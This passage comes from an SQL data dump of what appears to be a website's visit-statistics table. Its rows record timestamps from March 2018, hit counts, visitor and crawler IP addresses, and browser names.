0.107.179','other'),(221428,1521211500,1,1,0,0,'54.36.148.237','other'),(221429,1521211588,1,1,0,0,'54.36.149.67','other'),(221430,1521212033,1,1,0,0,'54.36.149.77','other'),(221431,1521212336,1,1,0,0,'54.36.148.184','other'),(221432,1521212471,2,2,0,0,'178.154.171.88','other'),(221433,1521212596,1,1,0,0,'54.210.107.179','other'),(221434,1521212772,3,3,0,0,'92.112.125.105','chrome'),(221435,1521212941,1,1,0,0,'66.249.66.195','chrome'),(221436,1521213111,1,1,0,0,'92.112.125.243','chrome'),(221437,1521213185,1,1,0,0,'66.249.66.201','chrome'),(221438,1521213302,1,1,0,0,'91.196.178.74','firefox'),(221439,1521213521,2,2,0,0,'54.210.107.179','other'),(221440,1521213839,1,1,0,0,'54.36.149.73','other'),(221441,1521213878,2,2,0,0,'92.112.125.105','chrome'),(221442,1521213984,1,1,0,0,'35.226.23.240','other'),(221443,1521214290,4,4,0,0,'88.99.19.242','other'),(221444,1521214425,1,1,0,0,'54.210.107.179','other'),(221445,1521214867,1,1,0,0,'188.230.43.254','other'),(221446,1521214995,1,1,0,0,'80.252.155.198','chrome'),(221447,1521215383,1,1,0,0,'54.36.148.58','other'),(221448,1521215763,1,1,0,0,'8.29.198.27','other'),(221449,1521215854,1,1,0,0,'54.210.107.179','other'),(221450,1521216414,1,1,0,0,'54.36.148.30','other'),(221451,1521216485,1,1,0,0,'54.36.148.17','other'),(221452,1521216957,1,1,0,0,'217.69.133.219','other'),(221453,1521217056,1,1,0,0,'188.230.43.254','other'),(221454,1521217625,1,1,0,0,'54.36.148.167','other'),(221455,1521217683,1,1,0,0,'54.36.149.36','other'),(221456,1521217745,1,0,1,0,'66.249.66.195',''),(221457,1521217847,1,1,0,0,'54.36.148.155','other'),(221458,1521218194,1,1,0,0,'188.230.43.254','other'),(221459,1521218470,1,1,0,0,'54.36.148.118','other'),(221460,1521218810,1,1,0,0,'54.36.149.59','other'),(221461,1521219042,1,1,0,0,'54.36.148.241','other'),(221462,1521219348,1,1,0,0,'77.111.244.50','chrome'),(221463,1521219414,1,1,0,0,'141.8.142.74','other'),(221464,1521220268,1,0,1,0,'66.249.66.195',''),(221465,1521220396,1,1,0,0,'37.9.113.182','other'),(221466,1521220469,1,1,0,0,'54.36.148.10','other'),(221467,1521220728,1,1,0,0,'54.210.107.179','other'),(221468,1521220864,1,1,0,0,'188.230.43.254','other'),(221469,1521221213,2,2,0,0,'141.8.142.74','other'),(221470,1521221388,2,2,0,0,'5.9.88.103','other'),(221471,1521221470,1,1,0,0,'54.36.148.154','other'),(221472,1521221557,1,1,0,0,'54.36.148.73','other'),(221473,1521221789,1,1,0,0,'54.36.148.230','other'),(221474,1521221962,2,2,0,0,'91.196.178.45','chrome'),(221475,1521222214,1,1,0,0,'54.36.149.25','other'),(221476,1521222243,2,2,0,0,'91.196.178.53','chrome'),(221477,1521222446,1,1,0,0,'37.9.113.182','other'),(221478,1521222453,1,1,0,0,'178.154.171.88','other'),(221479,1521222475,1,1,0,0,'217.69.133.238','other'),(221480,1521222593,1,1,0,0,'54.210.107.179','other'),(221481,1521222986,1,1,0,0,'54.36.148.173','other'),(221482,1521223398,1,1,0,0,'54.36.148.255','other'),(221483,1521223621,1,1,0,0,'80.252.155.198','firefox'),(221484,1521223930,1,1,0,0,'141.8.142.74','other'),(221485,1521224012,1,1,0,0,'54.36.149.106','other'),(221486,1521224234,1,1,0,0,'141.8.132.19','other'),(221487,1521224343,1,1,0,0,'54.210.107.179','other'),(221488,1521224541,1,1,0,0,'54.36.148.206','other'),(221489,1521224909,1,1,0,0,'87.250.224.46','other'),(221490,1521225096,1,1,0,0,'54.36.148.219','other'),(221491,1521225241,1,1,0,0,'54.36.148.153','other'),(221492,1521225436,1,1,0,0,'54.36.148.10','other'),(221493,1521225478,1,1,0,0,'54.36.148.136','other'),(221494,1521225632,1,1,0,0,'37.54.164.23','other'),(221495,1521225815,1,1,0,0,'54.36.148.229','other'),(221496,1521225974,1,1,0,0,'54.36.148.68','other'),(221497,1521226106,1,1,0,0,'54.36.148.95','other'),(221498,1521226216,1,1,0,0,'178.154.171.88','other'),(221499,1521226430,1,1,0,0,'207.46.13.72','other'),(221500,1521226459,1,1,0,0,'54.36.148.31','other'),(221501,1521226522,1,1,0,0,'54.36.149.11','other'),(221502,1521226601,1,1,0,0,'8.29.198.25','other'),(221503,1521226734,1,1,0,0,'217.69.133.193','other'),(221504,1521227005,1,1,0,0,'54.36.148.52','other'),(221505,1521227708,1,1,0,0,'37.73.192.148','chrome'),(221506,1521227777,1,1,0,0,'46.242.6.93','msie'),(221507,1521227924,2,2,0,0,'92.112.125.105','chrome'),(221508,1521228183,1,1,0,0,'91.209.11.236','other'),(221509,1521228214,1,1,0,0,'216.244.66.237','other'),(221510,1521228406,1,1,0,0,'54.36.148.82','other'),(221511,1521228701,1,1,0,0,'35.226.23.240','other'),(221512,1521229048,1,1,0,0,'54.36.148.240','other'),(221513,1521229806,1,1,0,0,'54.36.148.244','other'),(221514,1521230238,1,1,0,0,'91.196.178.61','chrome'),(221515,1521230468,1,0,1,0,'66.249.66.199',''),(221516,1521231218,1,1,0,0,'54.36.149.56','other'),(221517,1521231620,1,1,0,0,'54.36.148.212','other'),(221518,1521231640,1,1,0,0,'54.36.148.87','other'),(221519,1521231666,1,1,0,0,'54.36.148.145','other'),(221520,1521232361,1,1,0,0,'54.36.148.139','other'),(221521,1521232421,1,1,0,0,'141.8.142.74','other'),(221522,1521232495,1,1,0,0,'54.36.149.25','other'),(221523,1521232550,1,1,0,0,'54.36.149.47','other'),(221524,1521232582,1,1,0,0,'54.36.149.46','other'),(221525,1521232650,1,1,0,0,'54.36.149.35','other'),(221526,1521232895,1,1,0,0,'54.36.149.76','other'),(221527,1521233356,1,1,0,0,'54.36.149.11','other'),(221528,1521233779,1,1,0,0,'54.36.149.58','other'),(221529,1521234130,4,4,0,0,'158.69.254.103','other'),(221530,1521234394,2,2,0,0,'141.8.142.74','other'),(221531,1521234603,1,1,0,0,'54.36.148.57','other'),(221532,1521234771,1,1,0,0,'54.36.148.180','other'),(221533,1521234890,1,1,0,0,'178.154.171.88','other'),(221534,1521235394,1,1,0,0,'95.133.165.197','other'),(221535,1521235721,1,1,0,0,'34.239.248.162','other'),(221536,1521235763,1,1,0,0,'54.36.149.20','other'),(221537,1521235849,1,1,0,0,'91.196.178.164','chrome'),(221538,1521236642,1,1,0,0,'91.196.178.132','chrome'),(221539,1521237062,1,1,0,0,'217.69.136.204','other'),(221540,1521237294,1,1,0,0,'54.36.148.47','other'),(221541,1521237299,1,1,0,0,'54.36.148.155','other'),(221542,1521237454,1,1,0,0,'8.29.198.25','other'),(221543,1521237456,1,1,0,0,'54.36.149.63','other'),(221544,1521237624,1,1,0,0,'54.36.149.97','other'),(221545,1521237936,1,1,0,0,'178.154.171.88','other'),(221546,1521238099,1,1,0,0,'34.239.248.162','other'),(221547,1521238817,2,2,0,0,'91.196.178.163','chrome'),(221548,1521238955,1,1,0,0,'54.210.107.179','other'),(221549,1521238975,1,0,1,0,'66.249.66.158',''),(221550,1521239177,1,1,0,0,'54.36.148.134','other'),(221551,1521239356,1,1,0,0,'37.9.113.182','other'),(221552,1521239401,1,1,0,0,'54.36.148.132','other'),(221553,1521239621,1,0,1,0,'66.249.66.199',''),(221554,1521239884,1,1,0,0,'54.210.107.179','other'),(221555,1521239926,1,1,0,0,'54.36.148.86','other'),(221556,1521240126,1,1,0,0,'54.36.148.17','other'),(221557,1521240277,1,1,0,0,'54.36.148.216','other'),(221558,1521240566,1,1,0,0,'34.239.248.162','other'),(221559,1521240807,1,1,0,0,'54.210.107.179','other'),(221560,1521240852,1,1,0,0,'54.36.149.53','other'),(221561,1521241244,1,1,0,0,'54.36.148.184','other'),(221562,1521241686,1,1,0,0,'54.36.148.250','other'),(221563,1521241778,1,1,0,0,'40.77.167.130','other'),(221564,1521241807,1,1,0,0,'54.210.107.179','other'),(221565,1521242256,1,1,0,0,'54.36.148.155','other'),(221566,1521242817,1,1,0,0,'54.210.107.179','other'),(221567,1521242861,1,1,0,0,'34.239.248.162','other'),(221568,1521242889,1,1,0,0,'35.226.23.240','other'),(221569,1521242977,1,0,1,0,'66.249.66.201',''),(221570,1521243359,1,1,0,0,'37.9.113.182','other'),(221571,1521243809,1,1,0,0,'54.210.107.179','other'),(221572,1521244650,1,1,0,0,'37.9.113.115','other'),(221573,1521244726,1,1,0,0,'54.210.107.179','other'),(221574,1521244764,2,0,2,0,'66.249.66.157',''),(221575,1521244876,1,1,0,0,'54.36.148.76','other'),(221576,1521244900,1,1,0,0,'216.244.66.194','other'),(221577,1521245146,2,2,0,0,'141.8.142.74','other'),(221578,1521245681,1,1,0,0,'54.210.107.179','other'),(221579,1521245945,1,1,0,0,'54.36.149.8','other'),(221580,1521245999,1,1,0,0,'54.36.148.121','other'),(221581,1521246010,1,1,0,0,'54.36.148.205','other'),(221582,1521246202,1,1,0,0,'34.239.248.162','other'),(221583,1521246354,1,1,0,0,'54.36.149.45','other'),(221584,1521246599,1,1,0,0,'54.210.107.179','other'),(221585,1521246649,1,1,0,0,'141.8.142.74','other'),(221586,1521246900,1,1,0,0,'54.36.149.29','other'),(221587,1521247448,1,1,0,0,'54.36.148.102','other'),(221588,1521247741,1,1,0,0,'91.196.178.166','chrome'),(221589,1521247974,1,0,1,0,'66.249.66.195',''),(221590,1521248083,2,2,0,0,'141.8.142.74','other'),(221591,1521248086,1,1,0,0,'54.36.148.141','other'),(221592,1521248276,1,1,0,0,'54.36.149.82','other'),(221593,1521248292,1,1,0,0,'8.29.198.27','other'),(221594,1521248458,1,1,0,0,'217.69.133.227','other'),(221595,1521248592,1,1,0,0,'54.36.148.92','other'),(221596,1521248712,1,1,0,0,'54.36.148.109','other'),(221597,1521249096,1,1,0,0,'178.154.171.88','other'),(221598,1521249529,1,1,0,0,'157.55.39.73','other'),(221599,1521249855,1,1,0,0,'46.161.9.39','firefox'),(221600,1521250641,1,1,0,0,'54.36.148.212','other'),(221601,1521251006,1,1,0,0,'178.154.171.88','other'),(221602,1521251007,1,1,0,0,'54.36.148.183','other'),(221603,1521251077,1,0,1,0,'66.249.66.199',''),(221604,1521251387,3,3,0,0,'141.8.142.74','other'),(221605,1521251742,1,1,0,0,'216.244.66.194','other'),(221606,1521251826,1,1,0,0,'54.36.149.34','other'),(221607,1521252432,1,1,0,0,'54.36.149.95','other'),(221608,1521252528,1,1,0,0,'54.36.148.252','other'),(221609,1521252576,1,1,0,0,'178.154.171.88','other'),(221610,1521252882,1,1,0,0,'54.36.148.161','other'),(221611,1521253509,1,1,0,0,'54.36.148.106','other'),(221612,1521254089,1,1,0,0,'54.36.148.237','other'),(221613,1521254117,1,1,0,0,'34.239.248.162','other'),(221614,1521254185,1,1,0,0,'54.36.148.190','other'),(221615,1521254471,1,1,0,0,'54.36.149.23','other'),(221616,1521254858,1,1,0,0,'54.36.149.83','other'),(221617,1521255259,1,1,0,0,'80.252.154.233','chrome'),(221618,1521255597,1,1,0,0,'54.36.149.37','other'),(221619,1521256043,1,1,0,0,'54.36.149.94','other'),(221620,1521256337,1,1,0,0,'54.36.148.173','other'),(221621,1521256751,1,1,0,0,'54.36.148.192','other'),(221622,1521256770,1,1,0,0,'109.169.46.22','firefox'),(221623,1521256906,1,1,0,0,'178.154.171.88','other'),(221624,1521258146,1,1,0,0,'54.36.148.171','other'),(221625,1521258158,1,1,0,0,'54.36.149.104','other'),(221626,1521258175,1,1,0,0,'54.36.148.144','other'),(221627,1521258660,1,1,0,0,'178.154.171.88','other'),(221628,1521259124,1,1,0,0,'8.29.198.26','other'),(221629,1521259427,1,1,0,0,'54.36.148.148','other'),(221630,1521259584,1,1,0,0,'141.8.142.74','other'),(221631,1521259616,1,1,0,0,'87.250.224.46','other'),(221632,1521260152,1,1,0,0,'54.36.148.250','other'),(221633,1521260237,1,1,0,0,'217.69.133.10','other'),(221634,1521260298,1,1,0,0,'54.36.148.43','other'),(221635,1521260546,1,1,0,0,'54.36.149.43','other'),(221636,1521260939,1,1,0,0,'54.36.148.94','other'),(221637,1521261205,1,0,1,0,'66.249.66.201',''),(221638,1521261445,1,1,0,0,'54.36.149.103','other'),(221639,1521261512,1,1,0,0,'54.36.149.26','other'),(221640,1521261623,1,1,0,0,'54.36.149.101','other'),(221641,1521262632,1,1,0,0,'54.36.148.53','other'),(221642,1521263062,1,1,0,0,'54.36.148.74','other'),(221643,1521263153,2,2,0,0,'141.8.142.74','other'),(221644,1521263181,2,2,0,0,'37.9.113.182','other'),(221645,1521263619,2,2,0,0,'178.154.171.88','other'),(221646,1521263896,1,1,0,0,'54.36.149.5','other'),(221647,1521263975,1,1,0,0,'141.8.132.19','other'),(221648,1521264112,1,1,0,0,'54.36.148.80','other'),(221649,1521264562,1,1,0,0,'178.154.171.88','other'),(221650,1521264713,1,1,0,0,'54.36.148.91','other'),(221651,1521264743,1,1,0,0,'54.36.148.218','other'),(221652,1521265016,1,1,0,0,'54.36.148.23','other'),(221653,1521266092,1,1,0,0,'54.36.148.223','other'),(221654,1521266162,1,1,0,0,'157.55.39.234','other'),(221655,1521266216,1,1,0,0,'141.8.142.74','other'),(221656,1521266803,1,1,0,0,'54.36.149.91','other'),(221657,1521266858,1,1,0,0,'54.36.148.68','other'),(221658,1521266882,2,2,0,0,'216.244.66.237','other'),(221659,1521266927,1,1,0,0,'66.249.66.201','chrome'),(221660,1521267008,1,1,0,0,'54.36.148.95','other'),(221661,1521267778,1,1,0,0,'180.76.15.150','other'),(221662,1521268215,1,1,0,0,'37.9.113.115','other'),(221663,1521268217,1,1,0,0,'178.154.171.88','other'),(221664,1521268226,1,1,0,0,'180.76.15.154','other'),(221665,1521268256,1,1,0,0,'216.244.66.237','other'),(221666,1521268293,1,1,0,0,'128.72.214.7','chrome'),(221667,1521268833,1,1,0,0,'54.36.148.153','other'),(221668,1521269029,1,1,0,0,'80.252.154.233','chrome'),(221669,1521269688,1,1,0,0,'54.36.149.15','other'),(221670,1521269963,1,1,0,0,'8.29.198.27','other'),(221671,1521270046,1,1,0,0,'54.36.149.48','other'),(221672,1521270971,1,1,0,0,'54.36.148.187','other'),(221673,1521271462,2,2,0,0,'216.244.66.237','other'),(221674,1521271940,1,1,0,0,'54.36.149.4','other'),(221675,1521272480,1,1,0,0,'35.226.23.240','other'),(221676,1521272729,1,1,0,0,'54.36.148.216','other'),(221677,1521273049,1,1,0,0,'54.36.148.20','other'),(221678,1521273058,2,2,0,0,'92.112.125.105','chrome'),(221679,1521273207,1,1,0,0,'54.36.148.223','other'),(221680,1521273373,1,1,0,0,'40.77.167.156','other'),(221681,1521273723,1,1,0,0,'54.36.148.240','other'),(221682,1521273743,1,1,0,0,'141.8.142.74','other'),(221683,1521274096,1,1,0,0,'54.36.148.88','other'),(221684,1521274641,1,1,0,0,'54.36.148.196','other'),(221685,1521274675,2,2,0,0,'95.213.141.126','opera'),(221686,1521274763,1,1,0,0,'54.36.148.191','other'),(221687,1521274814,1,1,0,0,'54.36.148.181','other'),(221688,1521274916,1,1,0,0,'54.36.149.59','other'),(221689,1521276070,1,0,1,0,'66.249.66.156',''),(221690,1521276199,6,6,0,0,'46.229.173.137','other'),(221691,1521276583,5,5,0,0,'69.30.198.186','other'),(221692,1521276589,1,1,0,0,'178.154.171.88','other'),(221693,1521276640,1,1,0,0,'217.69.136.207','other'),(221694,1521277587,1,0,1,0,'66.249.66.158',''),(221695,1521278260,3,3,0,0,'37.54.114.62','chrome'),(221696,1521278868,1,1,0,0,'91.196.178.61','chrome'),(221697,1521278891,2,2,0,0,'141.8.142.74','other'),(221698,1521279167,1,1,0,0,'217.69.133.60','other'),(221699,1521279889,1,1,0,0,'54.36.148.213','other'),(221700,1521279922,1,1,0,0,'54.36.149.3','other'),(221701,1521279942,1,1,0,0,'141.8.142.74','other'),(221702,1521280119,1,1,0,0,'54.36.148.96','other'),(221703,1521280298,1,1,0,0,'93.123.164.210','chrome'),(221704,1521280326,2,2,0,0,'95.132.59.212','chrome'),(221705,1521280751,1,1,0,0,'93.171.245.221','firefox'),(221706,1521280799,1,1,0,0,'8.29.198.26','other'),(221707,1521281012,2,0,2,0,'66.249.66.195',''),(221708,1521281120,1,1,0,0,'66.249.66.157','chrome'),(221709,1521281173,1,0,1,0,'66.249.66.156',''),(221710,1521281198,1,1,0,0,'54.36.148.103','other'),(221711,1521281598,1,1,0,0,'54.36.148.196','other'),(221712,1521283327,1,1,0,0,'54.36.148.88','other'),(221713,1521283821,1,1,0,0,'54.36.148.177','other'),(221714,1521284304,1,1,0,0,'54.36.148.128','other'),(221715,1521284460,1,1,0,0,'54.36.148.237','other'),(221716,1521284529,1,1,0,0,'91.209.11.236','other'),(221717,1521284566,1,1,0,0,'216.244.66.237','other'),(221718,1521284806,1,1,0,0,'178.154.171.88','other'),(221719,1521284936,2,2,0,0,'91.196.178.45','chrome'),(221720,1521285163,1,1,0,0,'54.36.149.85','other'),(221721,1521285320,1,1,0,0,'54.36.148.68','other'),(221722,1521285514,1,1,0,0,'216.244.66.237','other'),(221723,1521285746,1,1,0,0,'54.36.148.38','other'),(221724,1521286197,1,1,0,0,'141.8.142.74','other'),(221725,1521286264,1,1,0,0,'51.15.209.51','other'),(221726,1521286333,1,1,0,0,'195.201.34.2','chrome'),(221727,1521286406,1,1,0,0,'54.36.148.145','other'),(221728,1521287006,1,1,0,0,'54.36.149.96','other'),(221729,1521287165,1,0,1,0,'66.249.66.156',''),(221730,1521287378,10,10,0,0,'114.35.141.89','other'),(221731,1521287397,3,3,0,0,'114.35.141.89','opera'),(221732,1521288041,1,1,0,0,'40.77.167.156','other'),(221733,1521288438,1,1,0,0,'141.8.142.74','other'),(221734,1521288579,1,0,1,0,'66.249.66.195',''),(221735,1521289200,1,1,0,0,'54.36.148.226','other'),(221736,1521289308,1,1,0,0,'54.36.148.239','other'),(221737,1521289862,1,1,0,0,'54.36.148.119','other'),(221738,1521289899,1,1,0,0,'178.154.171.60','other'),(221739,1521289908,3,3,0,0,'141.8.142.74','other'),(221740,1521289913,1,1,0,0,'178.154.171.88','other'),(221741,1521289967,1,1,0,0,'87.250.224.46','other'),(221742,1521290178,1,1,0,0,'216.244.66.246','other'),(221743,1521290785,1,1,0,0,'188.165.4.128','chrome'),(221744,1521291153,1,1,0,0,'54.36.148.105','other'),(221745,1521291535,1,1,0,0,'95.67.219.81','chrome'),(221746,1521291596,42,42,0,0,'46.229.173.137','other'),(221747,1521291634,1,1,0,0,'8.29.198.25','other'),(221748,1521291720,1,1,0,0,'178.150.224.88','chrome'),(221749,1521292028,1,1,0,0,'178.154.171.88','other'),(221750,1521292056,1,1,0,0,'37.9.113.182','other'),(221751,1521292478,1,1,0,0,'54.36.148.50','other'),(221752,1521292521,16,16,0,0,'46.229.173.137','other'),(221753,1521292796,1,0,1,0,'66.249.66.201',''),(221754,1521293612,1,1,0,0,'188.165.4.128','chrome'),(221755,1521293721,1,1,0,0,'91.196.178.165','chrome'),(221756,1521293893,1,1,0,0,'141.8.142.74','other'),(221757,1521294034,206,206,0,0,'54.175.215.92','other'),(221758,1521294124,2,2,0,0,'178.154.171.88','other'),(221759,1521294334,46,46,0,0,'50.62.160.107','other'),(221760,1521294342,10,10,0,0,'54.175.215.92','opera'),(221761,1521294964,1,1,0,0,'40.77.167.181','other'),(221762,1521295011,1,1,0,0,'54.36.149.76','other'),(221763,1521295047,1,1,0,0,'54.36.149.34','other'),(221764,1521295055,2,2,0,0,'216.244.66.246','other'),(221765,1521295527,1,0,1,0,'66.249.66.199',''),(221766,1521296272,1,1,0,0,'54.36.148.53','other'),(221767,1521296308,1,1,0,0,'40.77.167.174','other'),(221768,1521296727,2,2,0,0,'178.154.171.88','other'),(221769,1521296855,1,1,0,0,'87.250.224.46','other'),(221770,1521297162,1,1,0,0,'54.36.148.28','other'),(221771,1521297895,47,47,0,0,'46.229.173.137','other'),(221772,1521298311,1,1,0,0,'141.8.142.74','other'),(221773,1521298351,8,8,0,0,'178.33.23.156','other'),(221774,1521298603,1,1,0,0,'54.36.149.43','other'),(221775,1521298810,30,30,0,0,'46.229.173.137','other'),(221776,1521298842,1,1,0,0,'54.36.148.63','other'),(221777,1521298977,1,0,1,0,'66.249.66.156',''),(221778,1521299031,1,0,1,0,'66.249.66.201',''),(221779,1521299227,1,1,0,0,'141.8.142.74','other'),(221780,1521299354,1,1,0,0,'207.244.77.56','chrome'),(221781,1521299473,1,1,0,0,'178.33.23.156','other'),(221782,1521299820,1,1,0,0,'157.55.39.234','other'),(221783,1521299883,2,2,0,0,'93.72.205.184','chrome'),(221784,1521300133,1,1,0,0,'141.8.142.74','other'),(221785,1521300234,1,1,0,0,'40.77.167.156','other'),(221786,1521300454,1,1,0,0,'54.36.149.56','other'),(221787,1521301152,1,1,0,0,'46.229.173.137','other'),(221788,1521301193,1,1,0,0,'54.36.148.180','other'),(221789,1521301928,1,1,0,0,'54.36.148.126','other'),(221790,1521301969,2,2,0,0,'141.8.142.74','other'),(221791,1521301973,1,1,0,0,'178.154.171.88','other'),(221792,1521302481,1,1,0,0,'8.29.198.25','other'),(221793,1521302711,1,1,0,0,'188.32.190.177','msie'),(221794,1521302985,1,1,0,0,'217.69.133.216','other'),(221795,1521303289,58,58,0,0,'54.80.217.80','other'),(221796,1521303467,1,1,0,0,'54.36.149.59','other'),(221797,1521303476,1,1,0,0,'54.36.148.19','other'),(221798,1521303729,1,1,0,0,'54.36.149.104','other'),(221799,1521303884,2,2,0,0,'178.154.171.88','other'),(221800,1521304128,1,1,0,0,'217.69.133.9','other'),(221801,1521304198,37,37,0,0,'54.80.217.80','other'),(221802,1521304517,1,1,0,0,'54.36.148.234','other'),(221803,1521304640,2,2,0,0,'92.112.125.105','chrome'),(221804,1521304704,11,11,0,0,'46.229.173.137','other'),(221805,1521304961,1,1,0,0,'54.36.148.69','other'),(221806,1521306343,1,1,0,0,'204.79.180.20','msie'),(221807,1521306853,1,1,0,0,'217.69.133.252','other'),(221808,1521307640,1,1,0,0,'54.36.149.95','other'),(221809,1521307651,3,3,0,0,'91.196.178.49','chrome'),(221810,1521307882,1,1,0,0,'54.36.149.36','other'),(221811,1521307993,1,1,0,0,'54.36.148.187','other'),(221812,1521308050,1,1,0,0,'54.36.148.29','other'),(221813,1521308299,1,1,0,0,'46.229.173.137','other'),(221814,1521309747,3,3,0,0,'141.8.142.74','other'),(221815,1521309793,1,1,0,0,'54.36.148.101','other'),(221816,1521310564,1,1,0,0,'178.154.171.88','other'),(221817,1521310593,1,1,0,0,'54.36.149.9','other'),(221818,1521310602,3,3,0,0,'46.229.173.137','other'),(221819,1521310939,1,1,0,0,'54.36.148.12','other'),(221820,1521312280,1,1,0,0,'54.36.149.72','other'),(221821,1521312504,7,7,0,0,'46.229.173.137','other'),(221822,1521312529,1,1,0,0,'87.250.224.46','other'),(221823,1521312552,1,1,0,0,'178.154.171.88','other'),(221824,1521312556,2,2,0,0,'141.8.142.74','other'),(221825,1521312601,1,0,1,0,'66.249.66.201',''),(221826,1521312960,1,1,0,0,'157.55.39.75','other'),(221827,1521313316,1,1,0,0,'8.29.198.27','other'),(221828,1521313442,1,1,0,0,'54.36.148.217','other'),(221829,1521313562,1,1,0,0,'54.210.107.179','other'),(221830,1521313788,2,2,0,0,'91.196.178.76','chrome'),(221831,1521313843,1,1,0,0,'178.154.171.88','other'),(221832,1521313984,1,1,0,0,'54.36.148.79','other'),(221833,1521314090,1,1,0,0,'54.36.148.108','other'),(221834,1521314134,1,1,0,0,'80.240.128.62','chrome'),(221835,1521314347,1,1,0,0,'178.62.220.63','chrome'),(221836,1521314411,1,1,0,0,'130.180.220.46','other'),(221837,1521314702,1,1,0,0,'54.210.107.179','other'),(221838,1521314830,1,1,0,0,'46.229.173.137','other'),(221839,1521315182,1,1,0,0,'54.36.148.151','other'),(221840,1521315407,3,3,0,0,'178.154.171.88','other'),(221841,1521315935,1,1,0,0,'54.210.107.179','other'),(221842,1521316627,1,1,0,0,'141.8.142.74','other'),(221843,1521317003,1,1,0,0,'77.111.244.27','chrome'),(221844,1521317160,1,1,0,0,'54.210.107.179','other'),(221845,1521317166,1,1,0,0,'217.69.133.67','other'),(221846,1521317252,1,1,0,0,'212.83.178.172','chrome'),(221847,1521317415,1,1,0,0,'46.229.173.137','other'),(221848,1521317483,1,1,0,0,'54.36.148.91','other'),(221849,1521317552,1,1,0,0,'216.244.66.246','other'),(221850,1521317649,1,1,0,0,'54.36.149.30','other'),(221851,1521317686,1,1,0,0,'141.8.142.74','other'),(221852,1521317696,1,1,0,0,'178.94.168.139','chrome'),(221853,1521317849,1,1,0,0,'54.36.149.0','other'),(221854,1521317898,1,1,0,0,'54.36.149.10','other'),(221855,1521318062,1,1,0,0,'54.36.149.76','other'),(221856,1521318154,1,1,0,0,'54.36.148.159','other'),(221857,1521318230,1,1,0,0,'54.36.148.155','other'),(221858,1521318306,1,1,0,0,'54.210.107.179','other'),(221859,1521318555,2,2,0,0,'54.36.148.220','other'),(221860,1521318717,1,1,0,0,'157.55.39.244','other'),(221861,1521318841,1,1,0,0,'54.36.148.160','other'),(221862,1521318882,1,1,0,0,'141.8.142.74','other'),(221863,1521319088,1,1,0,0,'46.211.0.63','chrome'),(221864,1521319120,1,1,0,0,'87.250.224.46','other'),(221865,1521319173,1,1,0,0,'54.36.148.172','other'),(221866,1521319435,1,1,0,0,'54.36.148.79','other'),(221867,1521319503,1,1,0,0,'54.210.107.179','other'),(221868,1521319714,1,1,0,0,'54.36.148.183','other'),(221869,1521319919,2,2,0,0,'141.8.142.74','other'),(221870,1521320187,2,2,0,0,'178.154.171.88','other'),(221871,1521320304,1,1,0,0,'40.77.167.56','other'),(221872,1521320556,1,1,0,0,'54.36.149.22','other'),(221873,1521320613,1,1,0,0,'54.36.148.165','other'),(221874,1521320624,1,1,0,0,'54.210.107.179','other'),(221875,1521321251,1,1,0,0,'178.154.171.88','other'),(221876,1521321301,1,1,0,0,'217.69.133.15','other'),(221877,1521321365,1,1,0,0,'40.77.167.56','other'),(221878,1521321376,1,1,0,0,'54.36.149.39','other'),(221879,1521321427,1,1,0,0,'31.43.35.152','firefox'),(221880,1521321502,1,1,0,0,'54.36.148.166','other'),(221881,1521321575,1,1,0,0,'54.36.148.211','other'),(221882,1521321667,2,2,0,0,'141.8.142.74','other'),(221883,1521321756,1,1,0,0,'54.36.148.124','other'),(221884,1521321819,1,1,0,0,'54.210.107.179','other'),(221885,1521322141,2,0,2,0,'66.249.66.199',''),(221886,1521322747,1,1,0,0,'141.8.142.74','other'),(221887,1521322921,1,1,0,0,'54.36.148.162','other'),(221888,1521323116,1,1,0,0,'54.210.107.179','other'),(221889,1521323560,5,5,0,0,'46.229.173.137','other'),(221890,1521323771,1,1,0,0,'54.157.35.206','other'),(221891,1521323941,1,1,0,0,'54.36.148.188','other'),(221892,1521324152,1,1,0,0,'8.29.198.27','other'),(221893,1521324247,1,1,0,0,'54.210.107.179','other'),(221894,1521324290,1,1,0,0,'54.36.149.58','other'),(221895,1521324331,1,1,0,0,'54.36.148.128','other'),(221896,1521324567,1,1,0,0,'54.67.59.131','chrome'),(221897,1521324833,1,1,0,0,'54.36.148.99','other'),(221898,1521325195,1,1,0,0,'91.196.178.165','chrome'),(221899,1521325431,1,1,0,0,'54.210.107.179','other'),(221900,1521325545,1,1,0,0,'46.229.173.137','other'),(221901,1521325585,1,0,1,0,'66.249.66.156',''),(221902,1521325634,1,1,0,0,'178.154.171.88','other'),(221903,1521326337,11,11,0,0,'54.157.35.206','other'),(221904,1521326665,1,1,0,0,'213.180.203.8','other'),(221905,1521326716,1,1,0,0,'178.154.171.88','other'),(221906,1521326760,1,1,0,0,'217.69.136.209','other'),(221907,1521327040,1,0,1,0,'66.249.66.199',''),(221908,1521327184,1,1,0,0,'141.8.142.74','other'),(221909,1521327244,1,1,0,0,'54.36.149.15','other'),(221910,1521327276,1,1,0,0,'54.36.148.196','other'),(221911,1521327511,1,1,0,0,'54.36.148.153','other'),(221912,1521327848,1,1,0,0,'54.210.107.179','other'),(221913,1521327878,1,1,0,0,'54.36.148.27','other'),(221914,1521328403,1,1,0,0,'54.36.148.47','other'),(221915,1521328429,1,1,0,0,'141.8.142.74','other'),(221916,1521329059,1,1,0,0,'54.210.107.179','other'),(221917,1521329345,1,1,0,0,'54.36.148.79','other'),(221918,1521329672,1,1,0,0,'217.69.136.203','other'),(221919,1521329957,1,1,0,0,'54.36.148.109','other'),(221920,1521329973,2,2,0,0,'87.250.224.46','other'),(221921,1521330117,1,1,0,0,'46.229.173.137','other'),(221922,1521330297,1,1,0,0,'54.210.107.179','other'),(221923,1521330962,1,1,0,0,'54.36.149.35','other'),(221924,1521331476,1,1,0,0,'54.210.107.179','other'),(221925,1521331757,1,1,0,0,'54.36.148.92','other'),(221926,1521331836,1,1,0,0,'141.8.142.74','other'),(221927,1521331867,1,1,0,0,'54.36.148.133','other'),(221928,1521332449,1,1,0,0,'54.36.149.30','other'),(221929,1521332692,1,1,0,0,'54.210.107.179','other'),(221930,1521333152,1,1,0,0,'178.154.171.88','other'),(221931,1521333633,2,2,0,0,'216.244.66.237','other'),(221932,1521333921,1,1,0,0,'54.210.107.179','other'),(221933,1521334843,1,1,0,0,'46.229.173.137','other'),(221934,1521334899,1,1,0,0,'217.69.133.31','other'),(221935,1521334953,1,1,0,0,'54.36.148.100','other'),(221936,1521334991,1,1,0,0,'8.29.198.26','other'),(221937,1521335066,1,1,0,0,'54.210.107.179','other'),(221938,1521335272,1,1,0,0,'54.36.149.1','other'),(221939,1521335749,4,4,0,0,'141.8.142.74','other'),(221940,1521335774,1,1,0,0,'54.36.148.153','other'),(221941,1521335923,1,1,0,0,'54.36.148.147','other'